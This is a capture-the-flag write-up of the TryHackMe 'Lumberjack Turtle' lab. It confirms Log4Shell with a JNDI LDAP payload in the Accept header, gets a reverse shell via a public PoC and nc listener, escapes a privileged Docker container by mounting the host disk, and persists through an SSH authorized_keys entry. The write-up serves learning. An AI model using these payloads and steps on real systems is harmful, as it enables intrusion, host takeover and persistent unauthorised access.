Lumberjack Turtle (Medium) - THM writeup

Updated: Mar 10, 2022


Reconnaissance

Let's start with an Nmap scan:

nmap -sC -sV -oA nmap/log4j 10.10.43.2

We got two open ports: 22 and 80.

Enumeration

On the home page, we have:


Fuzzing the directories with wfuzz:

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 http://10.10.43.2/FUZZ


We got two hits for directories.


Go to the ~logs page.

It tells us to do a deep search.

So I started another directory search:

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/common.txt --hc 404 http://10.10.43.2/~logs/FUZZ


The directory is named after a popular log4j exploit, so let's try to exploit it.


Exploitation

Start an nc listener for testing.

Start Burp and intercept the request.

I send the payload in the Accept header:

${jndi:ldap://<ip>:<port>/a}

We got a response, so it's vulnerable.


I use this git repo for Log4Shell: https://github.com/kozmer/log4j-shell-poc

Clone the repo and install the requirements:

pip install -r requirements.txt

Also, you need to have java-8u20 in the cloned directory, as guided in the repo.

Download the tar file after making an account on the site.

Extract the tar file and move the contents into the cloned repo directory.


Rename the directory to "jdk1.8.0_20".

./poc.py --userip 10.9.3.37 --webport 8000 --lport 1234

Start an nc listener on the port you specified in the command (1234 in the command above).

Send the payload given by the script in the Accept header and you will get a connection back.


We get a shell.


Privilege Escalation

Now let's get our first flag:

find / | grep "flag"

This will give the flag location.

After getting the shell, I enumerated the environment. Through linpeas, I found that I was in a container with the --privileged flag enabled.

Inside Docker Check (Manually)

But I wanted to learn how to find this manually, so I did some research and found this article.


cat /proc/[]/cgroup: on a normal machine the file doesn't contain any docker entry; in this environment we have docker entries, so this tells us that we are in a Docker environment.



--privileged Flag Enabled Check (Manually)

Found this article.

It tells that if you can run

ip link add dummy0 type dummy

If this command runs inside the Docker container without error, then the flag is enabled.
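Both manual checks above can be scripted as a read-only audit of the container you are in. This is an added example, not code from the original writeup: it reads the cgroup file the writeup mentions and, in place of the `ip link add` test (which changes network state), parses the effective capability mask in /proc/self/status, since a default Docker container lacks CAP_NET_ADMIN and CAP_SYS_ADMIN while a --privileged one holds the full set. The sample /proc contents below are constructed, not captured from the box.

```python
"""Read-only audit: are we inside a Docker container, and does it look
--privileged?  Added example, not code from the original writeup."""
import re
from pathlib import Path

# Capability bit numbers from linux/capability.h.
CAP_NET_ADMIN = 12
CAP_SYS_ADMIN = 21

def cgroup_says_docker(cgroup_text: str) -> bool:
    """The writeup's check: /proc/<pid>/cgroup mentions docker only inside a container."""
    return any("docker" in line for line in cgroup_text.splitlines())

def effective_caps(status_text: str) -> set:
    """Parse the CapEff hex mask from /proc/self/status into capability bit numbers."""
    match = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    if not match:
        return set()
    mask = int(match.group(1), 16)
    return {bit for bit in range(64) if (mask >> bit) & 1}

def looks_privileged(status_text: str) -> bool:
    """Docker's default set drops NET_ADMIN and SYS_ADMIN; --privileged keeps them all.
    NET_ADMIN is what the writeup's `ip link add dummy0` test exercises."""
    caps = effective_caps(status_text)
    return CAP_NET_ADMIN in caps and CAP_SYS_ADMIN in caps

def audit(cgroup_text: str, status_text: str, dockerenv_exists: bool) -> dict:
    """Combine the signals; /.dockerenv is the marker file Docker drops in every container."""
    return {
        "in_docker": dockerenv_exists or cgroup_says_docker(cgroup_text),
        "privileged": looks_privileged(status_text),
    }

# Constructed /proc contents (not captured from the box).
SAMPLE_CGROUP = "12:devices:/docker/3f6c0a1b2c3d\n11:pids:/docker/3f6c0a1b2c3d\n"
SAMPLE_STATUS_DEFAULT = "Name:\tbash\nCapEff:\t00000000a80425fb\n"   # default Docker set
SAMPLE_STATUS_PRIVILEGED = "Name:\tbash\nCapEff:\t0000003fffffffff\n"  # --privileged

if __name__ == "__main__":
    live = audit(
        Path("/proc/1/cgroup").read_text(errors="replace"),
        Path("/proc/self/status").read_text(errors="replace"),
        Path("/.dockerenv").exists(),
    )
    print(live)
```

On cgroup v2 hosts /proc/1/cgroup is often just `0::/`, which is why the /.dockerenv marker is checked as well.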


Docker Container Escape

From the blog below, I got that containers with the privileged flag set can mount host storage.

We can see mountable disks with the following commands:

mount -l
fdisk -l

We can see that /dev/xvdf is mountable.

So we mount it:

mount <storage> <destination>

Get the root.txt file in the root directory of the mounted disk.

It tells us to "look harder".

There is a "…" directory that contains the flag.


Root Shell

To get a root shell on the system, create an SSH key pair on your machine:

ssh-keygen

Write the id_rsa.pub (public key) data into the authorized_keys file in the .ssh folder.

Then log in with the id_rsa key (private key).



Conclusion

This was a nice machine to exploit, especially for learning about Docker misconfigurations and log4j vulnerabilities.

That’s it! Hope you learned something from this write-up! Thanks for reading! 👍
